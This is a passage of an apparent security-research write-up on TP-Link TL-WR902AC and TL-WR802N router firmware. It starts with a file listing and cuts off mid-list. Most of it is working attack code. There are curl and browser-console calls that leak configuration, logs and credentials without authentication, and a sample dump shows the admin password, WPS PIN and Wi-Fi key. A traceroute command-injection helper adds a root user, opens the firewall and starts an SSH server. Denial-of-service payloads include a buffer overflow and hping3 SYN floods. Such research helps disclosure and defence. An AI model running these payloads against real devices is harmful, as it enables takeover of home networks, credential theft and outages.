│ ├── dynamicIp.htm
│ ├── ethIptv.htm
│ ├── ethWan.htm
│ ├── ethWan6.htm
│ ├── ftpSrv.htm
│ ├── fw6Lan.htm
│ ├── fw6LanEdit.htm
│ ├── fw6Rules.htm
│ ├── fw6RulesEdit.htm
│ ├── fw6Sche.htm
│ ├── fw6ScheEdit.htm
│ ├── fw6Wan.htm
│ ├── fw6WanEdit.htm
│ ├── fwLan.htm
│ ├── fwLanEdit.htm
│ ├── fwRules.htm
│ ├── fwRulesEdit.htm
│ ├── fwSche.htm
│ ├── fwScheEdit.htm
│ ├── fwWan.htm
│ ├── fwWanEdit.htm
│ ├── group.htm
│ ├── groupAdd.htm
│ ├── hw_nat.htm
│ ├── ipoa.htm
│ ├── ipsec.htm
│ ├── ipsecConfig.htm
│ ├── iptv.htm
│ ├── lan.htm
│ ├── lan6.htm
│ ├── lanAP.htm
│ ├── lanEdit.htm
│ ├── lanEditAP.htm
│ ├── ledControl.htm
│ ├── local.htm
│ ├── log.htm
│ ├── logConf.htm
│ ├── macClone.htm
│ ├── manageCtrl.htm
│ ├── no.htm
│ ├── parentCtrl.htm
│ ├── password.htm
│ ├── phDDNS.htm
│ ├── pingNTraceRoute.htm
│ ├── pingWatchDog.htm
│ ├── portTrigEdit.htm
│ ├── portTrigger.htm
│ ├── pppoa.htm
│ ├── pppoe.htm
│ ├── printSrv.htm
│ ├── qos.htm
│ ├── qosAppEdit.htm
│ ├── qosClsEdit.htm
│ ├── qosList.htm
│ ├── qosQueueEdit.htm
│ ├── qs3g.htm
│ ├── qsAuto.htm
│ ├── qsBandSelect.htm
│ ├── qsDetectErr.htm
│ ├── qsDsl.htm
│ ├── qsEnd.htm
│ ├── qsIPoA.htm
│ ├── qsL2tp.htm
│ ├── qsLan.htm
│ ├── qsMacClone.htm
│ ├── qsMode.htm
│ ├── qsMultiSSID.htm
│ ├── qsPPP.htm
│ ├── qsPPPoA.htm
│ ├── qsPptp.htm
│ ├── qsReview.htm
│ ├── qsSave.htm
│ ├── qsStaIP.htm
│ ├── qsStart.htm
│ ├── qsType.htm
│ ├── qsWl.htm
│ ├── qsWl5G.htm
│ ├── qsWlAP.htm
│ ├── qsWlAP5G.htm
│ ├── qsWlClient.htm
│ ├── qsWlHotspot.htm
│ ├── qsWlScanClient.htm
│ ├── qspassword.htm
│ ├── remote.htm
│ ├── restart.htm
│ ├── rip.htm
│ ├── route.htm
│ ├── route6.htm
│ ├── route6Edit.htm
│ ├── routeEdit.htm
│ ├── routeTbl.htm
│ ├── snmp.htm
│ ├── softup.htm
│ ├── stat.htm
│ ├── staticIp.htm
│ ├── status.htm
│ ├── status6.htm
│ ├── sysMode.htm
│ ├── time.htm
│ ├── trafCtrlEdit.htm
│ ├── trafficCtrl.htm
│ ├── tunnel6.htm
│ ├── upnp.htm
│ ├── usb3g.htm
│ ├── usb3gModemList.htm
│ ├── usb3gUpload.htm
│ ├── usbFolderBrowse.htm
│ ├── usbManage.htm
│ ├── usbSmbSrv.htm
│ ├── usbUserAccount.htm
│ ├── userFeedBack.htm
│ ├── virtualServer.htm
│ ├── vtlServEdit.htm
│ ├── wan.htm
│ ├── wlAcl.htm
│ ├── wlAcl5G.htm
│ ├── wlAclAdv.htm
│ ├── wlAclAdv5G.htm
│ ├── wlAclAdvMssid.htm
│ ├── wlAclMssid.htm
│ ├── wlAdv.htm
│ ├── wlAdv5G.htm
│ ├── wlBasic.htm
│ ├── wlBasic5G.htm
│ ├── wlBasicAP.htm
│ ├── wlBasicAP5G.htm
│ ├── wlBasicHotspot.htm
│ ├── wlBasicHotspot5G.htm
│ ├── wlBasicMssid.htm
│ ├── wlConnect.htm
│ ├── wlConnect5G.htm
│ ├── wlExtender.htm
│ ├── wlExtender5G.htm
│ ├── wlFrequency.htm
│ ├── wlGuest.htm
│ ├── wlGuest5G.htm
│ ├── wlGuestStats.htm
│ ├── wlGuestStats5G.htm
│ ├── wlQss.htm
│ ├── wlQss5G.htm
│ ├── wlQssAdv.htm
│ ├── wlQssAdv5G.htm
│ ├── wlScan.htm
│ ├── wlScan5G.htm
│ ├── wlScanClient.htm
│ ├── wlScanClient5G.htm
│ ├── wlScheEdit.htm
│ ├── wlScheEdit5G.htm
│ ├── wlSec.htm
│ ├── wlSec5G.htm
│ ├── wlSecMssid.htm
│ ├── wlStats.htm
│ ├── wlStats5G.htm
│ ├── wlThroughput.htm
│ ├── wlThroughput5G.htm
│ ├── yandexDns.htm
│ └── yandexDnsEdit.htm
├── mainFrame.htm
├── qr.htm
└── xml
└── log.txt
8 directories, 388 files
Using Packet Injection
In order to extract information from the server, one can either use cURL to forge packets or by using predefined JS functions executed via the webbrowsers console. Since any direct calls to the webserver end up in an
403 Forbidden http error, except for the root of the webserver, one needs to set the referer header to match the webservers IP address, this is necessary because the webpages is configured that the main frame usually loads content via AJAX without ever reloading the complete webpage. Using this method one can also set the authorization or session cookie if already aquired. Anywhow, this isn't needed for most calls on the TP-WR902AC with the FW version 170828. Seperate version may be listed below, depending on the firmware version.ⓘ Download any file from the webserver (Unauthorized)
curl -X GET "http://192.168.1.1/js/oid_str.js" -H "Referer: http://192.168.1.1"
ⓘ Get current session information (Authorized)
curl -X POST "http://192.168.1.1/cgi/info" --cookie "Authorization=Basic YWRtaW46YWRtaW4=" -H "Referer: http://192.168.1.1"
var userType="Admin";
var bSecured=0;
var clientLocal=1;
var clientIp="192.168.1.100";
var clientMac="XX:XX:XX:XX:XX:XX";
$.ret=0;
ⓘ Download the device configuration (Unauthorized)
$ curl -X POST "http://192.168.1.1/cgi/conf.bin" -H "Referer: http://192.168.1.1" --output ./conf.bin
Note: The downloaded
conf.bin has not been analyzed so far.Using JavaScript Injection
cURL could also be used for CGI call using forged payload. But since the data format accepted by the CGI deamon is quite complicate to understand, so it is easier to let the JS libaries, delivered with the front-end webpage, do that job for us. Still, it is possible to forge or replay such payloads if aquired via packet sniffing or similar. The CGI accepted dataformat gets not much further analyzed here. Instead, the following commands are executed via the console of a webrowser executed on the TP-Link webpage using the
$.act() and $exe() function defined in /js/lib.js. This will be elaborated in the next chapter Common Gateway Interface. For now the examples used for information gathering without explanations.Note: The Firmware identifiers used here are in fact the "buildDate" (YYMMDD). I use these to better draw link between differnet devices assuming a common code-base and vulnerabilities. See the Firmware section for more information.
ⓘ Get Device Information including FW version.
// Firmware: 170828
$.act(ACT_GET, IGD_DEV_INFO); $.exe();
// Firmware: 190428
$.act(ACT_GET, IGD_DEV_INFO); $.exe(null, false, 0);
ⓘ Use ACT_GET (and ACT_GL) to create the largest possible Information leaking command.
// Firmware: 170828
var act_get_oid_list = ["IGD", "IGD_DEV_INFO", "SYSLOG_CFG", "ETH_SWITCH", "SYS_CFG", "NET_CFG", "USER_CFG", "CURRENT_USER", "APP_CFG", "HTTP_CFG", "DYN_DNS_CFG", "UPNP_CFG", "DIAG_TOOL", "NOIP_DNS_CFG", "CMX_DNS_CFG", "WAN_TYPE_DETECT", "DMZ_HOST_CFG", "TIME", "HOUR", "L3_FORWARDING", "L3_IP6_FORWARDING", "L2_BRIDGING", "LAN_HOST_ENTRY", "WAN_ETH_INTF_STATS", "WAN_L2TP_CONN_STATS", "WAN_PPTP_CONN_STATS", "WAN_PPP_CONN_STATS", "STAT_CFG", "DDOS_CFG", "ARP_BIND", "TC", "ALG_CFG", "FIREWALL", "IP6_FIREWALL", "IP6_TUNNEL", "DSLITE", "SIT_6RD", "STORAGE_SERVICE", "CAPABLE", "FOLDER_BROWSE", "DLNA_MEDIA_SERVER", "SMB_SERVICE", "FTP_SERVER", "SYS_MODE", "EWAN", "CLOUD_SERVICE", "FW_UPGRADE_INFO", "OWNER_INFO", "CURRENT_USER_INFO", "CLOUD_DDNS", "CLOUD_DDNS_ENTRY", "WAN_ERROR_BLOCK", "FW_UP_INFO_BLOCK", "IPPING_DIAG", "TRACEROUTE_DIAG", "VLAN", "IPV6_CFG", "PRODUCE_INFO", "MULTIMODE", "PING_WATCH_DOG"];
for(let i=0; i<act_get_oid_list.length; i++){
$.act(ACT_GET, act_get_oid_list[i]);
}
$.act(ACT_GL,LAN_WLAN);
$.exe();
ⓘ Example Results (447 lines) (including "adminName", "adminPwd", "X_TP_PreSharedKey" and "flashPin"!)
[0,0,0,0,0,0]0
deviceSummary=InternetGatewayDevice:1.1[](Baseline:1, EthernetLAN:1)
LANDeviceNumberOfEntries=1
WANDeviceNumberOfEntries=0
[0,0,0,0,0,0]1
manufacturer=TP-Link
manufacturerOUI=98DAC4
modelName=TL-WR902AC
description=AC750 Wi-Fi Travel Router
productClass=IGD
serialNumber=98DAC46E00FC
hardwareVersion=TL-WR902AC v3 00000001
softwareVersion=0.9.1 0.1 v0089.0 Build 170828 Rel.57433n(4555)
modemFirmwareVersion=
enabledOptions=
additionalHardwareVersion=00000001
additionalSoftwareVersion=
specVersion=1.0
provisioningCode=
upTime=16922
firstUseDate=
deviceLog=0x58801d58
X_TP_HardwareID=6146446FA85583FDD5135E8275E48010
X_TP_FirmwareID=EF04518B7BA1296A8F491C96C45F01E9
X_TP_HardwareDescription=TL-WR902AC 3.0
X_TP_isFD=1
X_TP_DevManufacturerURL=http://www.tp-link.com
X_TP_DevModelVersion=3.0
X_TP_ProductID=903311
X_TP_ProductVersion=137
X_TP_SoftwareRevision=1437204481
X_TP_SoftwareRevisionMinor=0
X_TP_PlatformVersion=2768242945
X_TP_BuildDate=170828
X_TP_BuildTime=57433
[0,0,0,0,0,0]2
logToRemote=0
remoteSeverity=4
serverIP=192.168.0.100
serverPort=514
facility=1
logToLocal=1
localSeverity=6
logHeadPos=0
logTailPos=3897
[0,0,0,0,0,0]3
enableVirtualPorts=0
numberOfVirtualPorts=4
ifName=eth0
[0,0,0,0,0,0]4
flashMac=98:DA:C4:6E:00:FC
flashPin=37490720
flashZoneId=EUR
flashDevId=8000FB75D7711C1F692E48B22DE039B81BA9945D
flashOemId=A724943A07C41281802668C26C685D1A
flashSpecialId=45550000
flashCountryCode=DE
sign=
signLen=0
publicKey1=BgIAAACkAABSU0ExAAQAAAEAAQCNrP4jIUWitcvDIHr3OHnlzLCjGyJoLXgY9uH7tAVaYN+2YWEQ9RuS4PIQo7uWwHs7PYTAh9vF
publicKey2=pdMfu6NNkdvneLUER5V7Q5HtmPXd3roiIMi55tK7lA0B67bjYpBE/JM+SLbyMRgeNWut0YoufpLNV24ZQa0p7Xj4M5m2ZDclnA==
publicKeyLen=200
signStatus=0
[0,0,0,0,0,0]5
DNSServers=192.168.0.1,0.0.0.0
DNSifAliasName=ewan_ipoe_d
currDNSServer=16820416
[0,0,0,0,0,0]6
rootName=
rootPwd=
adminName=admin
adminPwd=admin
userName=
userPwd=
[0,0,0,0,0,0]7
userName=
passwd=
httpSession=
userSetting=0
action=0
loginStatus=0
userRole=3
logInCloud=0
needReconn=0
[0,0,0,0,0,0]8
localHost=
remoteHost=
[0,0,0,0,0,0]9
httpCharset=utf-8
httpLocalEnabled=1
httpLocalPort=80
httpRemoteEnabled=0
httpRemotePort=80
httpsLocalEnabled=0
httpsLocalPort=443
httpsRemoteEnabled=0
httpsRemotePort=443
[0,0,0,0,0,0]10
enable=0
state=0
userName=
password=
userDomain=
server=members.dyndns.org
login=1
[0,0,0,0,0,0]11
enable=1
[0,0,0,0,0,0]12
currCommand=0
currHost=0.0.0.0
lastCommand=0
lastHost=0.0.0.0
lastResult=0
[0,0,0,0,0,0]13
enable=0
state=3
userName=
password=
userDomain=
server=dynupdate.no-ip.com
login=1
[0,0,0,0,0,0]14
enable=0
state=0
userName=
password=
userDomain1=
userDomain2=
userDomain3=
userDomain4=
userDomain5=
server=dns.comexe.cn
login=1
[0,0,0,0,0,0]15
ifName=
state=1
wanType=0
wanTypeGet=0
[0,0,0,0,0,0]16
enable=0
IPAddress=
[0,0,0,0,0,0]17
__status=2
NTPServer1=
NTPServer2=
NTPServer3=
NTPServer4=
NTPServer5=
currentLocalTime=2020-06-28T21:31:33+00:00
localTimeZone=+00:00
localTimeZoneName=
daylightSavingsUsed=0
daylightSavingsStart=
daylightSavingsEnd=
X_TP_DaylightSavingsStartWeekCount=0
X_TP_DaylightSavingsEndWeekCount=0
X_TP_ShowDaylightSavingOnWeb=1
[0,0,0,0,0,0]18
year=2020
month=6
day=28
hours=21
minutes=31
seconds=33
[0,0,0,0,0,0]19
__defaultGateway=192.168.0.1
__ifName=eth0.2
__ifAliasName=ewan_ipoe_d
defaultConnectionService=
forwardNumberOfEntries=0
[0,0,0,0,0,0]20
__defaultGateway=::
__ifName=eth0.2
__ifAliasName=ewan_ipoev6_d
defaultConnectionService=
IPv6ForwardNumberOfEntries=0
[0,0,0,0,0,0]21
maxBridgeEntries=16
maxFilterEntries=64
maxMarkingEntries=0
bridgeNumberOfEntries=1
filterNumberOfEntries=7
markingNumberOfEntries=0
availableInterfaceNumberOfEntries=7
[0,0,0,0,0,0]22
IPAddress=192.168.1.100
leaseTimeRemaining=5737
MACAddress=XX:XX:XX:XX:XX:XX
hostName=Z
X_TP_ConnType=1
[0,0,0,0,0,0]23
bytesSent=0
bytesReceived=0
packetsSent=0
packetsReceived=0
[0,0,0,0,0,0]24
ethernetBytesSent=0
ethernetBytesReceived=0
ethernetPacketsSent=0
ethernetPacketsReceived=0
ethernetErrorsSent=0
ethernetErrorsReceived=0
ethernetUnicastPacketsSent=0
ethernetUnicastPacketsReceived=0
ethernetDiscardPacketsSent=0
ethernetDiscardPacketsReceived=0
ethernetMulticastPacketsSent=0
ethernetMulticastPacketsReceived=0
ethernetBroadcastPacketsSent=0
ethernetBroadcastPacketsReceived=0
ethernetUnknownProtoPacketsReceived=0
[0,0,0,0,0,0]25
ethernetBytesSent=0
ethernetBytesReceived=0
ethernetPacketsSent=0
ethernetPacketsReceived=0
ethernetErrorsSent=0
ethernetErrorsReceived=0
ethernetUnicastPacketsSent=0
ethernetUnicastPacketsReceived=0
ethernetDiscardPacketsSent=0
ethernetDiscardPacketsReceived=0
ethernetMulticastPacketsSent=0
ethernetMulticastPacketsReceived=0
ethernetBroadcastPacketsSent=0
ethernetBroadcastPacketsReceived=0
ethernetUnknownProtoPacketsReceived=0
[0,0,0,0,0,0]26
ethernetBytesSent=0
ethernetBytesReceived=0
ethernetPacketsSent=0
ethernetPacketsReceived=0
ethernetErrorsSent=0
ethernetErrorsReceived=0
ethernetUnicastPacketsSent=0
ethernetUnicastPacketsReceived=0
ethernetDiscardPacketsSent=0
ethernetDiscardPacketsReceived=0
ethernetMulticastPacketsSent=0
ethernetMulticastPacketsReceived=0
ethernetBroadcastPacketsSent=0
ethernetBroadcastPacketsReceived=0
ethernetUnknownProtoPacketsReceived=0
[0,0,0,0,0,0]27
enable=0
interval=10
action=0
[0,0,0,0,0,0]28
enable=0
enableIcmpFilter=0
icmpThreshold=50
enableUdpFilter=0
udpThreshold=500
enableSynFilter=0
synThreshold=50
forbidLanPing=0
forbidWanPing=1
action=0
[0,0,0,0,0,0]29
enable=0
[0,0,0,0,0,0]30
TCRuleNumberOfEntries=0
enable=0
linkType=0
upTotalBW=0
downTotalBW=0
iptvEnable=0
iptvUpMinBW=0
iptvDownMinBW=0
voIPEnable=0
voIPUpMinBW=20
[0,0,0,0,0,0]31
pptpAlg=1
l2tpAlg=1
ipSecAlg=1
ftpAlg=1
tftpAlg=1
h323Alg=1
sipAlg=1
rtspAlg=1
hw_nat_enable=0
[0,0,0,0,0,0]32
enable=0
defaultAction=0
enalbeParentCtrl=0
parentMac=
[0,0,0,0,0,0]33
enable=0
defaultAction=0
[0,0,0,0,0,0]34
mechanism=2
associatedWanIfName=
enabled=0
localAddress=
associatedLanIfName=br0
[0,0,0,0,0,0]35
enabled=0
dynamic=0
remoteIPv6Address=
[0,0,0,0,0,0]36
enabled=0
dynamic=0
IPv4MaskLen=0
prefix=
prefixLen=0
borderRelayIPv4Address=
[0,0,0,0,0,0]37
enable=1
userAccountNumberOfEntries=0
physicalMediumNumberOfEntries=0
logicalVolumeNumberOfEntries=0
ready=1
[0,0,0,0,0,0]38
FTPCapable=1
supportedNetworkProtocols=SMB
supportedFileSystemTypes=FAT16,FAT32,NTFS
[0,0,0,0,0,0]39
targetPath=
[0,0,0,0,0,0]40
serverState=0
serverName=MediaShare:1
scanFlag=0
scanInterval=3600
[0,0,0,0,0,0]41
enable=1
anonymous=1
modified=0
[0,0,0,0,0,0]42
enable=1
portNumber=21
accessFromInternet=0
wanIP=0.0.0.0
modified=0
[0,0,0,0,0,0]43
mode=ETH
DSLL3ForwardingName=NO_INTERFACE
ETHL3ForwardingName=NO_INTERFACE
_3GL3ForwardingName=NO_INTERFACE
DSLL3IPv6ForwardingName=NO_INTERFACE
ETHL3IPv6ForwardingName=NO_INTERFACE
[0,0,0,0,0,0]44
enable=1
MACAddress=
ifName=eth0.2
[0,0,0,0,0,0]45
alias=
legality=0
illegalType=0
tcspStatus=1
[0,0,0,0,0,0]46
type=0
version=
releaseDate=
releaseLog=
url=
start=0
status=0
progress=0
[0,0,0,0,0,0]47
email=
passwd=
needUnbind=0
md5Crypt=0
[0,0,0,0,0,0]48
nickname=
role=-1
token=
ewebURL=
action=0
status=0
[0,0,0,0,0,0]49
enable=1
boundDomain=
tmpDomainName=
action=0
status=0
[0,0,0,0,0,0]50
domainName=
regDate=
isBind=0
[0,0,0,0,0,0]51
enable=1
errorType=0
[0,0,0,0,0,0]52
isIgnored=0
ignoredTime=0
[0,0,0,0,0,0]53
diagnosticsState=None
maximumResponseTime=0
minimumResponseTime=65535
averageResponseTime=0
failureCount=0
successCount=0
X_TP_PktSequence=0
X_TP_ResponseTime=0
X_TP_IPAddress=0.0.0.0
X_TP_Result=
X_TP_ConnName=
X_TP_IfName=
DSCP=0
dataBlockSize=64
timeout=100
numberOfRepetitions=2
host=0.0.0.0
interface=
[0,0,0,0,0,0]54
diagnosticsState=None
routeHopsNumberOfEntries=0
responseTime=0
maxHopCount=30
DSCP=0
dataBlockSize=64
timeout=5
numberOfTries=2
X_TP_HopSeq=0
X_TP_IPAddress=0.0.0.0
X_TP_Result=
X_TP_ConnName=
X_TP_IfName=
host=
interface=
[0,0,0,0,0,0]55
enable=1
internetGroupVlanID=2
internetGroupExtendID=0
internetGroupLanPort=255
internetGroupPriority=0
internetUntag=1
workingMode=
[0,0,0,0,0,0]56
disableIPv6=1
lastUsedWanConnection=
[0,0,0,0,0,0]57
online=0
[0,0,0,0,0,0]58
oneKeyRePressed=0
mode=Router
first_login=0
router_IPInterfaceIPAddress=
router_IPInterfaceSubnetMask=
[0,0,0,0,0,0]59
enable=0
IPAddress=
interval=10
delay=5
failCount=5
[1,2,0,0,0,0]60
__syncApStatus=0
__apLastStatus=3
enable=1
status=Up
name=wlan5
BSSID=98:DA:C4:6E:00:FB
channel=36
autoChannelEnable=0
X_TP_PreSSID=TP-Link
SSID=TP-Link_00FC_5G
beaconType=11i
MACAddressControlEnabled=0
X_TP_MACAddressControlRule=deny
X_TP_MACTableSize=0
X_TP_Configuration_Modified=0
X_TP_Band=5GHz
X_TP_Bandwidth=Auto
standard=ac
WEPKeyIndex=1
WEPEncryptionLevel=Disabled,40-bits,104-bits
basicEncryptionModes=None
basicAuthenticationMode=None
WPAEncryptionModes=TKIPandAESEncryption
WPAAuthenticationMode=PSKAuthentication
IEEE11iEncryptionModes=AESEncryption
IEEE11iAuthenticationMode=PSKAuthentication
X_TP_PreSharedKey=37490720
X_TP_GroupKeyUpdateInterval=0
possibleChannels=
basicDataTransmitRates=6,12,24,
operationalDataTransmitRates=1,2,5.5,11,6,9,12,18,
possibleDataTransmitRates=
SSIDAdvertisementEnabled=1
transmitPowerSupported=100,50,20
transmitPower=100
regulatoryDomain=DE
deviceOperationMode=InfrastructureAccessPoint
X_TP_RadiusServerIP=
X_TP_RadiusServerPort=1812
X_TP_RadiusServerPassword=
WMMEnable=1
X_TP_BeaconInterval=100
X_TP_RTSThreshold=2346
X_TP_FragmentThreshold=2346
X_TP_DTIMFrequency=1
X_TP_IsolateClients=0
X_TP_ShortGIEnable=1
totalAssociations=65
maxStaNum=32
X_TP_ShowRegionSelectionOnWeb=0
[error]0
// Firmware: 190428
var act_get_oid_list = ["IGD_DEV_INFO", "ETH_SWITCH", "SYS_MODE", "MULTIMODE"]
for(let i=0; i<act_get_oid_list.length; i++){
$.act(ACT_GET, act_get_oid_list[i]);
}
$.exe(null, false, 0);
ⓘ Example Results (50 lines) (includes "softwareVersion" version)
[0,0,0,0,0,0]0
manufacturer=TP-Link
manufacturerOUI=74DA88
modelName=TL-WR802N
description=TP-Link Wireless N Nano Router WR802N
productClass=IGD
serialNumber=74DA88FCC3AE
hardwareVersion=TL-WR802N v4 00000004
softwareVersion=0.9.1 3.17 v0001.0 Build 190428 Rel.63523n
modemFirmwareVersion=
enabledOptions=
additionalHardwareVersion=00000004
additionalSoftwareVersion=
specVersion=1.0
provisioningCode=
upTime=76
firstUseDate=
deviceLog=0x58801d6c
X_TP_HardwareID=FEDC62EBE64D50D422C775E201ADCE6F
X_TP_FirmwareID=E24EF98E8F388F5387CC7AEA4D362363
X_TP_HardwareDescription=TL-WR802N 4.0
X_TP_isFD=1
X_TP_DevManufacturerURL=http://www.tp-link.com
X_TP_DevModelVersion=4.0
X_TP_ProductID=134348804
X_TP_ProductVersion=1
X_TP_SoftwareRevision=1437205265
X_TP_SoftwareRevisionMinor=0
X_TP_PlatformVersion=2768242945
X_TP_BuildDate=190428
X_TP_BuildTime=63523
[0,0,0,0,0,0]1
enableVirtualPorts=0
numberOfVirtualPorts=4
ifName=eth0
[0,0,0,0,0,0]2
mode=ETH
DSLL3ForwardingName=NO_INTERFACE
ETHL3ForwardingName=NO_INTERFACE
_3GL3ForwardingName=NO_INTERFACE
DSLL3IPv6ForwardingName=NO_INTERFACE
ETHL3IPv6ForwardingName=NO_INTERFACE
[0,0,0,0,0,0]3
oneKeyRePressed=0
mode=Router
first_login=0
router_IPInterfaceIPAddress=192.168.0.1
router_IPInterfaceSubnetMask=255.255.255.0
router_ConnName=
[error]0
ⓘ Download the server configuration
// Firmware: 170828, 190428
$.ajax(
{
type: "POST",
url: "http://192.168.1.1/cgi/conf.bin?",
success:function(data) {
console.log(data);
},
error:function(errno) {
console.log(errno);
}
});
ⓘ Download the server logs
// Firmware: 170828
$.ajax({
type: "POST",
url: "/cgi/log?",
success: data => console.log(data)
});
/* Example Results
1970-01-01 00:00:14 [5] DHCPC: Send DISCOVER with request ip 0.0.0.0 and unicast flag 0
1970-01-01 00:00:16 [5] DHCPC: Send DISCOVER with request ip 0.0.0.0 and unicast flag 0
1970-01-01 00:00:19 [5] DHCPC: Send DISCOVER with request ip 0.0.0.0 and unicast flag 0
1970-01-01 00:00:20 [5] DHCPC: Recv OFFER from server 192.168.0.1 with ip 192.168.0.107
1970-01-01 00:00:21 [5] DHCPC: Send REQUEST to server 192.168.0.1 with request ip 192.168.0.107
1970-01-01 00:00:22 [5] DHCPC: Recv ACK from server 192.168.0.1 with ip 192.168.0.107 lease time 3600
1970-01-01 00:00:22 [5] DHCPC: Recv DNS server address 192.168.0.1,0,0,0,0
2020-06-28 22:48:18 [5] DHCPD: Recv REQUEST from XX:XX:XX:XX:XX:XX
2020-06-28 22:48:19 [5] DHCPD: Send ACK to 192.168.1.100*/
ⓘ Download any file from the Webserver
// Firmware: 170828, 190428
let __getFile = path => {
$.ajax({
type: "POST",
url: path,
success: data => console.log(data),
error: errno => console.log(errno)
});
};
__getFile("/cgi/info");
Code Injection
Similar to the already listed CVE-2019-15060 concerning the TL-WR840N router with firmware 0.9.1 3.16, the traceroute function on the TP-Link TL-WR902AC v4 with firmware 0.9.1 0.1 (170828) is vulnerable to remote code execution via a crafted payload in an IP address input field. This again works totally unauthenticated from the login screen or via forget packet using cURL. The TL-WR802N with firmware 0.9.1 3.17 isn't affected anymore. While the DoS attack using the same traceroute function exists in both firmware versions.
ⓘ Command Injection via CGI Examples
// Inject Command
let __inject = command => {
let parameter = {host: ";"+command+";", X_TP_ConnName: "lo0"};
$.act(ACT_SET, TRACEROUTE_DIAG, null, null, parameter);
$.act(ACT_OP, ACT_OP_TRACERT);
$.exe();
}
// Reboot
__inject("reboot");
__inject("kill 1");
// Enable access to all service from WAN
// Web Interface fails due to wrong referer header
__inject("iptables -P INPUT ACCEPT");
// Add user to the passwd file
__inject("echo test:test:0:0:root:/:/bin/sh >> /var/passwd");
// Start another Dropbear instance on a different port
__inject("dropbear -p 2222 -r /var/tmp/dropbear/dropbear_rsa_host_key");
// Minified
$.act(ACT_SET, TRACEROUTE_DIAG, null, null, {host: ";reboot;", X_TP_ConnName: "lo0"});
$.act(ACT_OP, ACT_OP_TRACERT);
$.exe();
Note: The first
; is used to end the tracert command. The second ; is used to seperate any possibly attached tracert paramerters from the injected command.Denial-of-Service
There are several ways to make the device crash or misbehave.
ⓘ
Using Code Injection
// Crash device (Needs hard reset)
// Firmware: 170828 (no auth)
$.act(ACT_SET, TRACEROUTE_DIAG, null, null, { host: ";" }); $.exe();
// Doesn't poweroff but crashes everything instead
// Firmware: 170828
$.act(ACT_SET, TRACEROUTE_DIAG, null, null, { host: ";poweroff;" }); $.exe();
ⓘ
Using Buffer Overflow
// This kills the httpd deamon (verified using UART) (restart httpd not working)
// Firmware: 170828 (no auth), 190428 (auth)
let __inject = command => {
$.act(ACT_SET, TRACEROUTE_DIAG, null, null, {host: command, X_TP_ConnName: "lo0"});
$.act(ACT_OP, ACT_OP_TRACERT);
$.exe();
}
let buffer_size = 2046;
let buffer = "";
for(let i = 0; i < buffer_size; i++){
buffer += "X";
}
__inject(buffer);
/* Remaining services running
PORT STATE SERVICE VERSION
21/tcp closed ftp vsftpd 2.0.8 or later
22/tcp open ssh Dropbear sshd 2012.55
80/tcp closed http TP-LINK TD-W8968 http
1900/tcp open upnp Portable SDK for UPnP
139 /tcp closed netbios-ssn Samba smbd 3.X - 4.X
445/tcp closed netbios-ssn Samba smbd 3.0.14a
40955/tcp closed upnp Portable SDK for UPnP
*/
ⓘ
Using hPing
# TCP SYN FLOOD ATTACK
# Strongly affects the overall system performance and makes even a UART connection buggy
sudo hping3 -c 15000 -d 120 -S -w 64 -p 80 --flood --rand-source 192.168.1.1
# Makes everything slower but no global denial of service
sudo hping3 -c 15000 -d 120 -S -w 64 -p 22 --flood --rand-source 192.168.1.1
sudo hping3 -c 15000 -d 120 -S -w 64 -p 21 --flood --rand-source 192.168.1.1
sudo hping3 -c 15000 -d 120 -S -w 64 -p 139 --flood --rand-source 192.168.1.1
sudo hping3 -c 15000 -d 120 -S -w 64 -p 445 --flood --rand-source 192.168.1.1
sudo hping3 -c 15000 -d 120 -S -w 64 -p 1900 --flood --rand-source 192.168.1.1
sudo hping3 -c 15000 -d 120 -S -w 64 -p 40955 --flood --rand-source 192.168.1.1
ⓘ
Using some odd CGI calls
// Also crashes the server (Dont know which oid)
// httpd still running but not responding anymore (doesnt kill any service)
var oid_list = [IGD, IGD_DEV_INFO, SYSLOG_CFG, MANAGEMENT_SERVER, ETH_SWITCH, SYS_CFG, NET_CFG, USER_CFG, CURRENT_USER, APP_CFG, HTTP_CFG, PH_DDNS_CFG, PH_RT_DATA, DYN_DNS_CFG, UPNP_CFG, UPNP_PORTMAPPING, DIAG_TOOL, CWMP_CFG, SNMP_CFG, NOIP_DNS_CFG, CMX_DNS_CFG, ACL_CFG, WAN_TYPE_DETECT, DMZ_HOST_CFG, TIME, HOUR, L3_FORWARDING, L3_FORWARDING_ENTRY, L3_IP6_FORWARDING, L3_IP6_FORWARDING_ENTRY, L2_BRIDGING, L2_BRIDGING_ENTRY, L2_BRIDGING_FILTER, L2_BRIDGING_INTF, LAN_DEV, LAN_HOST_CFG, LAN_IP_INTF, LAN_DHCP_STATIC_ADDR, LAN_DHCP_COND_SRV_POOL, LAN_DHCP_COND_SRV_POOL_OPT, YANDEX_DNS_POOL, LAN_IP6_HOST_CFG, LAN_IP6_INTF, LAN_ETH_INTF, LAN_HOSTS, LAN_HOST_ENTRY, LAN_WLAN, LAN_WLAN_WPS, LAN_WLAN_MACTABLEENTRY, LAN_WLAN_ASSOC_DEV, LAN_WLAN_BSSDESC_ENTRY, LAN_WLAN_WEPKEY, LAN_WLAN_WDSBRIDGE, LAN_WLAN_MULTISSID, LAN_WLAN_MSSIDENTRY, LAN_WLAN_MSSIDWEPKEY, MSSID_MACTABLEENTRY, LAN_WLAN_WLBRNAME, LAN_WLAN_TASK_SCHEDULE, LAN_WLAN_QUICKSAVE, LAN_WLAN_GUESTNET, LAN_IGMP_SNOOP, WAN_DEV, WAN_COMMON_INTF_CFG, WAN_DSL_INTF_CFG, WAN_DSL_INTF_STATS, WAN_DSL_INTF_STATS_TOTAL, WAN_DSL_AUTOPVC, WAN_DSL_AUTO_PVC_PAIR, WAN_ETH_INTF, WAN_ETH_INTF_STATS, WAN_PON, WAN_EPON_INTF, WAN_EPON_INTF_OAM_STATS, WAN_EPON_INTF_MPCP_STATS, WAN_EPON_INTF_STATS, WAN_EPON_INTF_OPTICAL_STATS, WAN_GPON_INTF, WAN_GPON_INTF_OMCI_STATS, WAN_GPON_INTF_STATS, WAN_GPON_INTF_OPTICAL_STATS, WAN_CONN_DEVICE, WAN_DSL_LINK_CFG, WAN_PON_LINK_CFG, WAN_ETH_LINK_CFG, WAN_USB_3G_LINK_CFG, USB_MODEM_PARAM, WAN_L2TP_CONN, WAN_L2TP_CONN_PORTMAPPING, L2TP_CONN_PORTTRIGGERING, WAN_L2TP_CONN_STATS, WAN_PPTP_CONN, WAN_PPTP_CONN_PORTMAPPING, PPTP_CONN_PORTTRIGGERING, WAN_PPTP_CONN_STATS, WAN_IP_CONN, WAN_IP_CONN_PORTMAPPING, IP_CONN_PORTTRIGGERING, WAN_PPP_CONN, 